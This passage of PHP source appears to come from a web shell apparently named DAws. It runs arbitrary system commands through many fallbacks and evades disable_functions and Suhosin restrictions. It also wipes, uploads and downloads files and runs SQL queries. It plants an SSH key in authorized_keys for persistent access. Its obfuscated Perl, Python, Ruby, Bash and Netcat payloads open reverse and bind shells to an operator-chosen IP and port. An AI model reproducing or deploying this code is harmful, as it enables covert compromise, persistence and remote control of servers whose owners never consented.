867 $it = new ArrayIterator(array(""));
868 iterator_apply($it, $function, array($arg1));
869 } else if (disabled_php("register_tick_function") == False) {
870 declare(ticks=1);
871 register_tick_function($function, $arg1);
872 unregister_tick_function($function);
873 } else if (disabled_php("array_map") == False) {
874 array_map($function, array($arg1));
875 } else if (disabled_php("array_walk") == False) {
876 $x = array($arg1, $arg2, $arg3);
877 array_walk($x, $function);
878 } else if (disabled_php("array_filter") == False) {
879 array_filter(array($arg1), $function);
880 } else if (disabled_php("register_shutdown_function")) {
881 register_shutdown_function($function, $arg1);
882 }
883 }
884 } else {
885 if (disabled_php("call_user_func") == False) {
886 $return_value = call_user_func($function);
887 } else if (disabled_php("call_user_func_array") == False) {
888 $return_value = call_user_func_array($function, array());
889 } else if ((version_compare(PHP_VERSION, '5.0.0') >= 0) && (disabled_php(null, "ReflectionFunction") == False)) {
890 $ref_function = new ReflectionFunction($function);
891 $handle = $ref_function->invoke();
892 if (is_string($handle)) {
893 $return_value = $handle;
894 } else {
895 $return_value = fread($handle, 4096);
896 pclose($handle);
897 }
898 } else if ($output_needed == False) {
899 if ((version_compare(PHP_VERSION, '5.1.0') >= 0) && (disabled_php(null, "ArrayIterator") == False)) {
900 $it = new ArrayIterator(array(""));
901 iterator_apply($it, $function, array());
902 } else if (disabled_php("register_tick_function") == False) {
903 declare(ticks=1);
904 register_tick_function($function);
905 unregister_tick_function($function);
906 } else if (disabled_php("array_map") == False) {
907 array_map($function, array());
908 } else if (disabled_php("array_walk") == False) {
909 $x = array();
910 array_walk($x, $function);
911 } else if (disabled_php("array_filter") == False) {
912 array_filter(array(), $function);
913 } else if (disabled_php("register_shutdown_function")) {
914 register_shutdown_function($function);
915 }
916 }
917 }
918 return $return_value;
919}
920
921function execute_command($command, $software_check = False) { //this is also used to check for installed softwares
922 if ($software_check == True) {
923 if (($_SESSION["windows"]) == True) {
924 $command = "where $command";
925 } else {
926 $command = "which $command";
927 }
928 }
929
930 if (disabled_php("system") == False) { //not disabled by disable_functions
931 ob_start();
932 if (disabled_suhosin("system") == False) { //not disabled by Suhosin
933 system($command);
934 } else { //disabled by Suhosin
935 bypass_suhosin("system", $command, null, null, null, null, False);
936 }
937 $return_value = ob_get_contents();
938 ob_end_clean();
939 } else if (disabled_php("passthru") == False) {
940 ob_start();
941 if (disabled_suhosin("passthru") == False) {
942 passthru($command);
943 } else {
944 bypass_suhosin("passthru", $command, null, null, null, null, False);
945 }
946 $return_value = ob_get_contents();
947 ob_end_clean();
948 } else if (disabled_php("shell_exec") == False) {
949 if (disabled_suhosin("shell_exec") == False) {
950 $return_value = shell_exec($command);
951 } else {
952 $return_value = bypass_suhosin("shell_exec", $command);
953 }
954 } else if (disabled_php("exec") == False) {
955 if (disabled_suhosin("exec") == False) {
956 $return_value = exec($command);
957 } else {
958 $return_value = bypass_suhosin("exec", $command);
959 }
960 } else if (disabled_php("popen") == False) {
961 if (disabled_suhosin("popen") == False) {
962 $handle = popen($command, "r");
963 } else {
964 $handle = bypass_suhosin("popen", $command, "r");
965 }
966 $return_value = fread($handle, 4096);
967 pclose($handle);
968 } else if (disabled_php("proc_open") == False) {
969 if (disabled_suhosin("proc_open") == False) {
970 $process = proc_open(
971 $command,
972 array(
973 0 => array("pipe", "r"),
974 1 => array("pipe", "w"),
975 2 => array("pipe", "w"),
976 ),
977 $pipes
978 );
979 } else { //this gave me a headache so I will check it out later
980 /*
981 echo "proc_open-suhosin";
982 $process = bypass_suhosin(
983 "proc_open",
984 $command,
985 array(
986 0 => array("pipe", "r"),
987 1 => array("pipe", "w"),
988 2 => array("pipe", "w"),
989 ),
990 $pipes);*/
991 }
992
993 $stdout = stream_get_contents($pipes[1]);
994 $stderr = stream_get_contents($pipes[2]);
995 fclose($pipes[1]);
996 fclose($pipes[2]);
997 proc_close($process);
998
999 if ($stderr == "") {
1000 $return_value = $stdout;
1001 } else {
1002 $return_value = $stderr;
1003 }
1004 } else if ((isset($_SESSION["cgi"])) && ($_SESSION["cgi"] == True)) {
1005 $return_value = url_get_contents($_SESSION["cgi_url"]."?command=".base64encoding($command));
1006 } else if ((isset($_SESSION["shsh"])) && ($_SESSION["shsh"] == True)) {
1007 $return_value = shsh($command);
1008 } else if ((isset($_SESSION["shsh2"])) && ($_SESSION["shsh2"] == True)) {
1009 $return_value = shsh2($command);
1010 } else if ((isset($_SESSION["ssh"])) && ($_SESSION["ssh"] == True)) {
1011 $return_value = execute_ssh($command);
1012 } else {
1013 $return_value = "";
1014 }
1015
1016 if ($software_check == True) {
1017 if (($return_value != "") && (strpos($return_value, "Could not find files") === False)) {
1018 return True;
1019 } else {
1020 return False;
1021 }
1022 } else {
1023 return $return_value;
1024 }
1025}
1026
1027function execute_script($code, $location, $extension, $output_needed = False) {
1028 $filename = $_SESSION["daws_directory"]."/".time().".".$extension;
1029 write_to_file($filename, $code);
1030
1031 $command = $location." ".$filename;
1032
1033 //run the script in background and redirect its output to null
1034 if ($output_needed == False) { //we have to make sure that the user doesn't care about the output since we're redirecting it to null
1035 if ($_SESSION["windows"] == True) {
1036 $command = "START /B $command > null";
1037 } else if (execute_command("nohup", True)) { //use nohup if installed
1038 $command = "nohup $command > /dev/null 2>&1 &";
1039 }
1040 }
1041
1042 return execute_command($command);
1043}
1044
1045function file_get_contents_extended($filename, $is_url = False, $context = null) { //same thing was done for multiple other functions, the point is to bypass Suhosin using less code lol
1046 if (disabled_php("file_get_contents") == False) {
1047 if ((($is_url == True) && (ini_get("allow_url_fopen"))) || ($is_url == False)) {
1048 if (disabled_suhosin("file_get_contents") == False) {
1049 return file_get_contents($filename, False, $context);
1050 } else {
1051 return bypass_suhosin("file_get_contents", $filename, False, $context);
1052 }
1053 }
1054 } else {
1055 return False;
1056 }
1057}
1058
1059function fopen_extended($filename, $type, $is_url=False, $context=null) {
1060 if (disabled_php("fopen") == False) {
1061 if ((($is_url == True) && (get_php_ini("allow_url_fopen"))) || ($is_url == False)) {
1062 if (disabled_suhosin("fopen") == False) {
1063 if ($context != null) { //it will cause an error if we don't do that, unlike file_get_contents
1064 return fopen($filename, $type, False, $context);
1065 } else {
1066 return fopen($filename, $type);
1067 }
1068 } else {
1069 if ($context != null) {
1070 return bypass_suhosin("fopen", $filename, $type, False, $context);
1071 } else {
1072 return bypass_suhosin("fopen", $filename, $type);
1073 }
1074 }
1075 }
1076 } else {
1077 return False;
1078 }
1079}
1080
1081function file_put_contents_extended($file_name, $input) {
1082 if (disabled_php("file_put_contents") == False) {
1083 if (disabled_suhosin("file_put_contents") == False) {
1084 file_put_contents($file_name, $input);
1085 } else {
1086 bypass_suhosin("file_put_contents", $file_name, $input, null, null, null, False);
1087 }
1088 } else {
1089 return False;
1090 }
1091
1092 return True;
1093}
1094
1095function include_php($filename) {
1096 if (disabled_php("include") == False) {
1097 if (disabled_suhosin("include") == False) {
1098 include($filename);
1099 } else {
1100 bypass_suhosin("include", $filename, null, null, null, null, False);
1101 }
1102 unlink($filename);
1103 } else if (disabled_php("include_once") == False) {
1104 if (disabled_suhosin("include_once") == False) {
1105 include_once($filename);
1106 } else {
1107 bypass_suhosin("include_once", $filename, null, null, null, null, False);
1108 }
1109 unlink($filename);
1110 } else if (disabled_php("require") == False) {
1111 if (disabled_suhosin("require") == False) {
1112 require($filename);
1113 } else {
1114 bypass_suhosin("require", $filename, null, null, null, null, False);
1115 }
1116 unlink($filename);
1117 }
1118 else if (disabled_php("require_once") == False) {
1119 if (disabled_suhosin("require_once") == False) {
1120 require_once($filename);
1121 } else {
1122 bypass_suhosin("require_once", $filename, null, null, null, null, False);
1123 }
1124 unlink($filename);
1125 }
1126}
1127
1128function execute_php($code, $output_needed) { //eval and its substitutes
1129 if (!get_php_ini("suhosin.executor.disable_eval")) { //we use eval since it's not blocked by suhosin
1130 eval($code);
1131 } else if ((disabled_php("include") == False) || (disabled_php("include_once") == False) || (disabled_php("require") == False) || (disabled_php("require_once") == False)) { //let the bodies hit the floor!
1132 $code = "<?php\n".$code."\n?>";
1133 $filename = $_SESSION["daws_directory"]."/".time().".php";
1134 write_to_file($filename, $code);
1135
1136 include_php($filename);
1137 }
1138 else {
1139 $code = "<?php\n".$code."\n?>";
1140
1141 echo execute_script($code, $_SESSION["php"], "php", $output_needed);
1142 }
1143}
1144
1145function get_permissions($location) { //used to get the permissions of everything in the file manager
1146//this whole function was taken from http://php.net/manual/en/function.fileperms.php
1147 $perms = fileperms($location);
1148
1149 if (($perms & 0xC000) == 0xC000)
1150 $info = 's';
1151 elseif (($perms & 0xA000) == 0xA000)
1152 $info = 'l';
1153 elseif (($perms & 0x8000) == 0x8000)
1154 $info = '-';
1155 elseif (($perms & 0x6000) == 0x6000)
1156 $info = 'b';
1157 elseif (($perms & 0x4000) == 0x4000)
1158 $info = 'd';
1159 elseif (($perms & 0x2000) == 0x2000)
1160 $info = 'c';
1161 elseif (($perms & 0x1000) == 0x1000)
1162 $info = 'p';
1163 else
1164 $info = 'u';
1165
1166 $info .= (($perms & 0x0100) ? 'r' : '-');
1167 $info .= (($perms & 0x0080) ? 'w' : '-');
1168 $info .= (($perms & 0x0040) ?
1169 (($perms & 0x0800) ? 's' : 'x' ) :
1170 (($perms & 0x0800) ? 'S' : '-'));
1171
1172 $info .= (($perms & 0x0020) ? 'r' : '-');
1173 $info .= (($perms & 0x0010) ? 'w' : '-');
1174 $info .= (($perms & 0x0008) ?
1175 (($perms & 0x0400) ? 's' : 'x' ) :
1176 (($perms & 0x0400) ? 'S' : '-'));
1177
1178 $info .= (($perms & 0x0004) ? 'r' : '-');
1179 $info .= (($perms & 0x0002) ? 'w' : '-');
1180 $info .= (($perms & 0x0001) ?
1181 (($perms & 0x0200) ? 't' : 'x' ) :
1182 (($perms & 0x0200) ? 'T' : '-'));
1183
1184 return $info;
1185}
1186
1187//ordering our file manager by alpha order and dirs come first.
1188function sortRows($data) {
1189 $size = count($data);
1190
1191 for ($i = 0; $i < $size; ++$i) {
1192 $row_num = findSmallest($i, $size, $data);
1193 $tmp = $data[$row_num];
1194 $data[$row_num] = $data[$i];
1195 $data[$i] = $tmp;
1196 }
1197
1198 return ($data);
1199}
1200
1201function findSmallest($i, $end, $data) {
1202 $min['pos'] = $i;
1203 $min['value'] = $data[$i]['data'];
1204 $min['dir'] = $data[$i]['dir'];
1205 for (; $i < $end; ++$i) {
1206 if ($data[$i]['dir']) {
1207 if ($min['dir']) {
1208 if ($data[$i]['data'] < $min['value']) {
1209 $min['value'] = $data[$i]['data'];
1210 $min['dir'] = $data[$i]['dir'];
1211 $min['pos'] = $i;
1212 }
1213 } else {
1214 $min['value'] = $data[$i]['data'];
1215 $min['dir'] = $data[$i]['dir'];
1216 $min['pos'] = $i;
1217 }
1218 } else {
1219 if (!$min['dir'] && $data[$i]['data'] < $min['value']) {
1220 $min['value'] = $data[$i]['data'];
1221 $min['dir'] = $data[$i]['dir'];
1222 $min['pos'] = $i;
1223 }
1224 }
1225 }
1226
1227 return ($min['pos']);
1228}
1229
1230if (isset($_POST['download'])) { //downloads a file, what else could it be...
1231 $file = unxor_this($_POST['download']);
1232 header('Content-Description: File Transfer');
1233 header('Content-Type: application/octet-stream');
1234 header('Content-Disposition: attachment; filename='.basename($file));
1235 header('Expires: 0');
1236 header('Cache-Control: must-revalidate');
1237 header('Pragma: public');
1238 header('Content-Length: ' . filesize($file));
1239 readfile($file);
1240} else if (isset($_POST['command'])) { //executes a command
1241 $GLOBALS["command"] = str_replace("\n", "<br/>", execute_command(unxor_this($_POST["command"])));
1242} else if (isset($_POST['del'])) { //deletes a file or a directory
1243 $delete = unxor_this($_POST['del']);
1244 if (is_dir($delete)) {
1245 if ($_SESSION["windows"] == True) {
1246 execute_command("rmdir $delete /s");
1247 } else {
1248 execute_command("rm -r $delete");
1249 }
1250 } else {
1251 unlink($delete);
1252 }
1253} else if (isset($_POST['wipe'])) { //wipes a file
1254 //nothing badass really, we'll just replace all the old bytes with null bytes
1255 $wipe = unxor_this($_POST['wipe']);
1256 $file_size = filesize($wipe);
1257
1258 $fp = fopen_extended($wipe, "rb+");
1259 if ($fp != False) {
1260 $fwrite = fwrite($fp, str_repeat("\0", $file_size), $file_size);
1261 fclose($fp);
1262 }
1263} else if (isset($_POST['edit'])) { //edits a file, I know, that's a badass comment.
1264 $content = unxor_this($_POST['edit']);
1265 $location = unxor_this($_POST['location']);
1266
1267 write_to_file($location, $content);
1268
1269 $_POST['dir'] = $_POST['location'];
1270} else if (isset($_POST['zip'])) { //zips a folder; multiple methods
1271 $location = unxor_this($_POST['zip']);
1272
1273 if ((version_compare(PHP_VERSION, '5.2.0') >= 0) && (installed_php(null, "ZipArchive") == True)) { //best way
1274 $zip = new ZipArchive();
1275 $zip->open($_SESSION["daws_directory"]."/".basename($location).'.zip', ZipArchive::CREATE | ZipArchive::OVERWRITE);
1276
1277 $files = new RecursiveIteratorIterator(
1278 new RecursiveDirectoryIterator($location),
1279 RecursiveIteratorIterator::LEAVES_ONLY
1280 );
1281
1282 foreach ($files as $name => $file) {
1283 if (!$file->isDir()) {
1284 $filePath = $file->getRealPath();
1285 $relativePath = substr($filePath, strlen($location) + 1);
1286
1287 $zip->addFile($filePath, $relativePath);
1288 }
1289 }
1290
1291 $zip->close();
1292 } else { //system commands
1293 if ($_SESSION["windows"] == True) {
1294 if (strpos(execute_command("powershell.exe", True), "Windows PowerShell")) { //powershell gets the job done
1295 execute_command("powershell.exe -nologo -noprofile -command \"& { Add-Type -A 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::CreateFromDirectory('$location', '".$location.".zip'); }\"");
1296 } else { //vbs script it is
1297 $code = 'ArchiveFolder "'.$_SESSION["daws_directory"]."/".basename($location).'.zip", "' . $location . '"'.unxor_this("NxoWQzECBQEFEwEpGw8UFRRJRB8NHzIKHBVKSR8jCwMQBgJZbGNMRURPIwoEGEYqHgAFGxEsEhoDChhNRjwXERkAEgACAkopHQ8VIx8aGAAJIBYJFRMSS0VvRE9UQ1BQRkkWDBQpHQ8VUFtJQiIBGzUBAx8KHBgANA4ACz4RCwxEHw0fMgocFU9jTEVET1RDUFAVLwMJAAoGQ01QSC4JESUNBwwcBRIMPAQQBzoCHRVOGioKCAsREVl6bElMRURPVENQJw8dBEVKLAYGEQQDPQkdECkdDxVYHAAcIw0DEU9QJBQcCUxuT1RDUFBGSUxFRE9UTScCDx0JRScHBktIQE9JSkUnBwZLR0VPSUpFJwcGS0VZRk9MJgwdXFVZUEBJPxEWBhoEWEFeRUwGDB1cU1lZbElMRURPVENQNQgNTDINGxxpUFBGSSkLAE8jCgQYbGNMRURPIwoEGEYqHgAFGxEsEhoDChhNRjwcBhwcSCgcFQgGFwIEGQkHTkxuT1RDUFBGSUxLKg4ZBiMABwoJTR4GBCUZHANAQiYLHw0rFQIDSUIrBQIRMAARBQxEFiIAGAcVAk9HJREBAgdpelBGSUxFRE9UJx9QMwcYDAhPWi0RHQM6HAQHClwZGQAgAAAATUE9FxUdFUcvChEBAENNUDljTEVET1RDUFBGSUxFRE9UQ1BeKAgBADcfFQAVWBUvAwkACgZKXjkSDAEWSiwbFh4EbElMRURPVENQUEZJTDI3DAYKAARIOgAAAR9UUkBAVklmRURPVENQUEYlAwoUZVRDUFAjBwhFMwYAC3p6IwcIRTcaFg==", "dotcppfile");
1298 write_to_file($_SESSION["daws_directory"]."/zip_folder.vbs", $code);
1299 execute_command("cscript //nologo ".$_SESSION["daws_directory"]."/zip_folder.vbs");
1300 }
1301 } else {
1302 execute_command("zip -r ".$_SESSION["daws_directory"]."/".basename($location).".zip $location");
1303 }
1304 }
1305} else if (isset($_POST['new_name'])) { //renames a file
1306 $old_name = unxor_this($_POST['old_name']);
1307 $new_name = unxor_this($_POST['dir'])."/".unxor_this($_POST['new_name']);
1308
1309 rename($old_name, $new_name);
1310} else if (isset($_POST['new_chmod'])) { //chmods a file
1311 $file_name = unxor_this($_POST['file_name']);
1312
1313 @chmod($file_name, octdec(intval(unxor_this($_POST['new_chmod'])))); //we try to chmod it with error supression
1314} else if (isset($_FILES["file_upload"])) { //uploads multiple files
1315 $file_ary = array();
1316 $file_count = count($_FILES["file_upload"]["name"]);
1317 $file_keys = array_keys($_FILES["file_upload"]);
1318
1319 for ($i=0; $i<$file_count; $i++) {
1320 foreach ($file_keys as $key) {
1321 $file_ary[$i][$key] = $_FILES["file_upload"][$key][$i];
1322 }
1323 }
1324
1325 foreach ($file_ary as $file) {
1326 $target_file = $_SESSION["daws_directory"]."/".basename($file["name"]);
1327 move_uploaded_file($file["tmp_name"], $target_file);
1328 }
1329} else if (isset($_POST["link_download"])) { //downloads a file from a direct link
1330 $link = unxor_this($_POST["link_download"]);
1331 $location = $_SESSION["daws_directory"]."/".basename($link);
1332
1333 $output = url_get_contents($link);
1334 write_to_file($location, $output);
1335} else if (isset($_POST["mkfile"])) { //creates a file
1336 $location = unxor_this($_POST["dir"])."/".unxor_this($_POST["mkfile"]);
1337
1338 write_to_file($location, "");
1339} else if (isset($_POST["mkdir"])) { //creates a directory
1340 $location = unxor_this($_POST["dir"])."/".unxor_this($_POST["mkdir"]);
1341
1342 mkdir($location);
1343} else if (isset($_POST["sql_user"])) { //this is basically a sql connection test
1344 $_SESSION["sql_host"] = unxor_this($_POST["sql_host"]);
1345 $_SESSION["sql_user"] = unxor_this($_POST["sql_user"]);
1346 $_SESSION["sql_pass"] = unxor_this($_POST["sql_pass"]);
1347 $_SESSION["sql_database"] = unxor_this($_POST["sql_database"]);
1348
1349 if (installed_php(null, "PDO")) { //used PDO if it's installed
1350 try { //we will use this try to catch PDO errors with an exception
1351 $conn = new PDO("mysql:host=".$_SESSION["sql_host"].";dbname=".$_SESSION["sql_database"], $_SESSION["sql_user"], $_SESSION["sql_pass"]);
1352
1353 $conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); //set pdo error mode to exception
1354
1355 $conn = null;
1356
1357 $_SESSION["mysqli"] = True; //success
1358 } catch(PDOException $e) {
1359 $_SESSION["mysqli"] = False;
1360 }
1361 } else {
1362 $link = @mysqli_connect($_SESSION["sql_host"], $_SESSION["sql_user"], $_SESSION["sql_pass"], $_SESSION["sql_database"]);
1363
1364 if (!mysqli_connect_errno()) {
1365 $_SESSION["mysqli"] = True; //success
1366 } else {
1367 $_SESSION["mysqli"] = False;
1368 }
1369
1370 @mysqli_close($link);
1371 }
1372} else if (isset($_POST["sql_execute"])) {
1373 $sql_query = unxor_this($_POST["sql_execute"]);
1374
1375 if (installed_php(null, "PDO")) { //used PDO if it's installed
1376 try { //we will use this try to catch PDO errors with an exception
1377 //reconnecting each time because persistent connections were added in php 5.3 so we simply can't risk it...
1378 $conn = new PDO("mysql:host=".$_SESSION["sql_host"].";dbname=".$_SESSION["sql_database"], $_SESSION["sql_user"], $_SESSION["sql_pass"]);
1379
1380 $conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); //set pdo error mode to exception
1381
1382 $sth = $conn->prepare($sql_query);
1383 $sth->execute();
1384
1385 $result = $sth->fetchAll();
1386
1387 $return_value = "";
1388 foreach ($result as $row) {
1389 for ($i = 0; $i < sizeof($row)/2; $i++) {
1390 $return_value .= htmlspecialchars($row[$i])." ";
1391 }
1392 $return_value .= "\n";
1393 }
1394
1395 $conn = null;
1396 } catch(PDOException $e) {
1397 $return_value = $e->getMessage();
1398 }
1399 } else {
1400 $link = mysqli_connect($_SESSION["sql_host"], $_SESSION["sql_user"], $_SESSION["sql_pass"], $_SESSION["sql_database"]);
1401
1402 if ($result = mysqli_query($link, $sql_query)) {
1403 $col_cnt = mysqli_field_count($link);
1404 if ($col_cnt != 0) {
1405 $return_value = "";
1406 while ($row = mysqli_fetch_row($result)) {
1407 for ($i = 0; $i < $col_cnt; $i++) {
1408 $return_value .= htmlspecialchars($row[$i])." ";
1409 }
1410 $return_value .= "\n";
1411 }
1412 mysqli_free_result($result);
1413 } else {
1414 $return_value = "";
1415 }
1416 } else {
1417 $return_value = mysqli_error($link);
1418 }
1419
1420 mysqli_close($link);
1421 }
1422
1423 if (isset($_POST["save_output"])) {
1424 write_to_file($_SESSION["daws_directory"]."/sql_".time(), $return_value);
1425 } else {
1426 $GLOBALS["sql_output"] = $return_value;
1427 }
1428} else if ((isset($_POST["ssh_user"])) && file_exists($_SESSION["daws_directory"]."/AES.php") && file_exists($_SESSION["daws_directory"]."/Base.php") && file_exists($_SESSION["daws_directory"]."/BigInteger.php") && file_exists($_SESSION["daws_directory"]."/Blowfish.php") && file_exists($_SESSION["daws_directory"]."/DES.php") && file_exists($_SESSION["daws_directory"]."/Hash.php") && file_exists($_SESSION["daws_directory"]."/openssl.cnf") && file_exists($_SESSION["daws_directory"]."/Random.php") && file_exists($_SESSION["daws_directory"]."/RC2.php") && file_exists($_SESSION["daws_directory"]."/RC4.php") && file_exists($_SESSION["daws_directory"]."/Rijndael.php") && file_exists($_SESSION["daws_directory"]."/RSA.php") && file_exists($_SESSION["daws_directory"]."/SSH2.php") && file_exists($_SESSION["daws_directory"]."/TripleDES.php") && file_exists($_SESSION["daws_directory"]."/Twofish.php")) {
1429 //finding the right ssh port, the home directory and the user automatically is somehow stupid.
1430 //it will require a lot of work and a lot of code that will force DAws to use multiple functions that could be
1431 //blocked by security systems. Lets not forget that even if all of this succeeded, the collected information
1432 //could be wrong.
1433 //if these values were well provided by the user then this method will have a higher success rate.
1434 $_SESSION["home_dir"] = unxor_this($_POST["home_dir"]); //can be found by using DAws's file manager
1435 $_SESSION["ssh_port"] = unxor_this($_POST["ssh_port"]); //can be found by simple port scan
1436 $_SESSION["ssh_user"] = unxor_this($_POST["ssh_user"]); //can be found by using DAws's file manager as well
1437
1438 //creating the key
1439 include_php($_SESSION["daws_directory"]."/RSA.php"); //this should have been uploaded by the user himself
1440 $rsa = new Crypt_RSA();
1441 $rsa->setPublicKeyFormat(CRYPT_RSA_PUBLIC_FORMAT_OPENSSH); //formatted for OpenSSH
1442 $key = $rsa->createKey(1024);
1443 $rsa->loadKey($key["privatekey"]);
1444
1445 //we have to serialize the rsa object since we want to store it in a session variable for later use
1446 $_SESSION["ssh_rsa"] = serialize($rsa);
1447
1448 if ($_SESSION["windows"] == True) //http://osses.info/openssh.htm (FreeSSHD) will work on it later
1449 {
1450 } else { //http://sshkeychain.sourceforge.net/mirrors/SSH-with-Keys-HOWTO/SSH-with-Keys-HOWTO-4.html (4.4)
1451 $ssh_dir = $_SESSION["home_dir"]."/.ssh";
1452 //authorized_keys not authorized_keys2 because in the new release authorized_keys2 has been removed
1453 //http://marc.info/?l=openssh-unix-dev&m=100508718416162&w=2
1454 $authorized_keys = $_SESSION["home_dir"]."/.ssh/authorized_keys";
1455
1456 if (!file_exists($ssh_dir)) { //.ssh doens't exist
1457 if (is_writable($_SESSION["home_dir"])) { //we can create the .ssh folder
1458 mkdir($ssh_dir);
1459 chmod($ssh_dir, 0700);
1460 $ssh_dir_exists = True;
1461 } else { //we can't create the .ssh folder
1462 $ssh_dir_exists = False;
1463 }
1464 } else { //.ssh already exists
1465 $ssh_dir_exists = True;
1466 }
1467
1468 if ($ssh_dir_exists == True) { //we got a .ssh directory
1469 if (!file_exists($authorized_keys)) { //authorized_keys doens't exist
1470 if (is_writable($ssh_dir)) {
1471 write_to_file($authorized_keys, $key["publickey"]);
1472 chmod($authorized_keys, 0600);
1473
1474 $everything_ready = True;
1475 } else {
1476 $everything_ready = False;
1477 }
1478 } else { //authorized_keys already exists
1479 @chmod($authorized_keys, 0600); //we try to chmod it first with error supression
1480
1481 if ((is_readable($authorized_keys)) && (is_writable($authorized_keys))) {
1482 //not appending with fopen since fopen could be disabled, write_to_file will use multiple other functions.
1483 $output = file_get_contents_extended($authorized_keys);
1484 write_to_file($authorized_keys, $output.$key["publickey"]);
1485
1486 $everything_ready = True;
1487 } else {
1488 $everything_ready = False;
1489 }
1490 }
1491 } else {
1492 $everything_ready = False;
1493 }
1494
1495 if ($everything_ready == True) {
1496 if (execute_ssh("echo dotcppfile") == "dotcppfile") {
1497 $_SESSION["ssh"] = True;
1498 } else {
1499 $_SESSION["ssh"] = False;
1500 }
1501 } else {
1502 $_SESSION["ssh"] = False;
1503 }
1504 }
1505} else if (isset($_POST["reverse_ip"])) { //reverse shells
1506 $rs_lang = unxor_this($_POST["rs_lang"]);
1507
1508 if ($rs_lang == "Perl") {
1509 $shell = "ERwRQyMfBQIJEV9lfkcZAFtLXVdTQURNQF5XS1dvQB8bEQRNUl1YUV9lfhAfEw0MGE03Q1QzNi8vJykxSE8nLDM7OTo4NyEuOU9QFwMdHBcLGxsBCR4HBAlNRhsXE1JZT1Jmbw0JXAAfHggMDxFMPFhDAx8FAg0BAB0rCh5YQhkDFxBDVAoeFRI2DRELAVxHGQBPQEVMbhR+ah8AAwdENjArPS1cUlhPP0dNVH5qHwADB0Q2MCs7NiRcRFdKNkZGT2l5HxYMAk03OzAmIiJKS1JDN01dWHp5AxEJBkxNWwEZHkkaBEVJBlZKS3obUg==";
1510 $location = $_SESSION["perl"];
1511 $extension = "pl";
1512 } else if ($rs_lang == "Python") {
1513 $shell = "DQIEDAIERhoDBg8KAE9QAxMLHBcLDBEQA1xGBh9vbgYEXlJBVF5CVUpfWlJSehYGHhFZW0BXRHpsGkxYRBwbABsVEkcfCgcEERdYAwkKBwAQQTUlLzkoLDhJRBwbABsVEkc/KickKzAkIiMoIUxuHFoAHx4IDA8RTEcdE1xQFgYeEU1GfmkfA0gNGRVWRwdNFhkKDAIKTEZYU1l6CRpCAREfRksDXgAAAAAKAFxKXEFPYwMWSgsBE0JYFUcKDAgKGgxYWUpbRW9uH1ReUAMTCxwXCwwREANeBQgACUw0VkwSGQhGHw1GQ1RBXRlENEU=";
1514 $location = $_SESSION["python"];
1515 $extension = "py";
1516 } else if ($rs_lang == "Ruby") {
1517 $shell = "FgoFFhkCA0lLFgsMHwYEV2xjBRVZTUVRR15WR1xLVU1+Ex8CElRYUVBbfmkWUFtJOCY0PBsAGxUSRwMVAQFcCgBcRhkDFxBGWhcfLw9jCR0BDFQQAAIPBxgDTE1bARkeSRoERUkGVF9WVQJJUkNBC1RRTlZDDU5JAkMSTxZZ";
1518
1519 $location = $_SESSION["ruby"];
1520 $extension = "rb";
1521 } else if ($rs_lang == "Bash") {
1522 $shell = "DR9JQUFCUUdcS1RBRUF6AAkbGFhQW0BXenoDEQkGRFpIXV8UAx9DEQcfW0cZAElNHAoWG34AEQRGVUpQRBNUFBgZCgxMFwEOEEMcGQgMV0UAAFRHHBkIDExXWklBQ05WU1JMAQsBEQ==";
1523
1524 $location = "bash";
1525 $extension = "sh";
1526 }
1527
1528 $ip = unxor_this($_POST["reverse_ip"]);
1529 $port = unxor_this($_POST["reverse_port"]);
1530
1531 $shell = unxor_this($shell, "dotcppfile");
1532 $shell = str_replace("ip=\"127.0.0.1\"", "ip=\"$ip\"", $shell);
1533 $shell = str_replace("port=4444", "port=$port", $shell);
1534
1535 if (isset($_POST["background"])) {
1536 execute_script($shell, $location, $extension);
1537 } else {
1538 execute_script($shell, $location, $extension, True);
1539 }
1540} else if (isset($_POST["bind_port"])) { //bind shells
1541 $bs_lang = unxor_this($_POST["bs_lang"]);
1542
1543 if ($bs_lang == "Perl") {
1544 $shell = "ERwRQyMfBQIJEV9lfkcAHxQdUVFQW0BYenoVBg8OARtcMDUiMCw+SUQuMjw5PiM9QEU3IDcoLyMyOykkKUNUBBUEFhsDEQsNDQ0RHQNBSxEHH1NKWUtsYwUDTA0dDRRYNSw+MyE9WEMDHwUCDQEAHSsKHlhCGQMXEENUCh4VEjYNEQsBXEFBQlFHXEtUQUVBWVlPQGYebmYYCgMEAwdENiE9IiYiXFdZRV5EZX0CExMDGRhNJyM9Jj4kSjopNzIqJkpLemxgAxUBAVwwJDQvJ0BHWkk3Lzk1KD1OTF9lfQwAFQhBPzEgICE3XFJYTy8pLSo6N1JZXWNlChQKGksjJCIsPjdITUpFMzwvLCIxRkZPaXkVHgwPTUZAFgoeXxUBTEgNTV1Yeg0=";
1545 $location = $_SESSION["perl"];
1546 $extension = "pl";
1547 } else if ($bs_lang == "Python") {
1548 $shell = "DQIEDAIERhoDBg8KAE9QAxMLHBcLDBEQA1xGBh9vbh8bEQRNUl1YUW5lB0NNUBUGDw4BG1oQHxMNDBhNFwAXCBUESCgqOi0hMTdcUBUGDw4BG1owPzMtNj8xNio1Lll6FUcODAoLXEtSQVReQlVKX1pSUlxGGQMXEEZdaQNeCgAfEQEBXFZZemwKAwsKQ1QCFBQUSVFFF0EVABMVFh1ETG5lGxBeFBMZXk0HABoNXhYPBQkLC0ddT0BZbAYfSwAaBFFYEwkHAksCBhgGHh9OQEBUTWUbEF4UExleTQcAGg1eFg8FCQsLR11PQllsYxxFWU8HFhIAFAYPABccWgARHApBN0dLDR0NXwMOS0BFRkIdQS1Z";
1549 $location = $_SESSION["python"];
1550 $extension = "py";
1551 } else if ($bs_lang == "Ruby") {
1552 $shell = "FgoFFhkCA0lLFgsMHwYEV2xjHAoWG0lXRERSY2YWAR0CBgJQW0k4JjQ8EREGFRRHAgATTwQMAgRsCgAMAQEAQ01QFQweEwEdWgITEwMZGG9uCgwGE1AVGR4MChsSS1JfBAACShcHVE4ZUFpPSQFEUVJGFFBUV0pAAE1YABwZAwcYSQcDHQYeBEoKAAwBAQBK";
1553
1554 $location = $_SESSION["ruby"];
1555 $extension = "rb";
1556 } else if ($bs_lang == "Netcat") {
1557 $shell = "FAAGF01EUl1Yb24BF0NdHBAZTEEUAAYXUF0DSUMHDQFbEBg=";
1558
1559 $location = "bash";
1560 $extension = "sh";
1561 }
1562
1563 $port = unxor_this($_POST["bind_port"]);
1564
1565 $shell = unxor_this($shell, "dotcppfile");
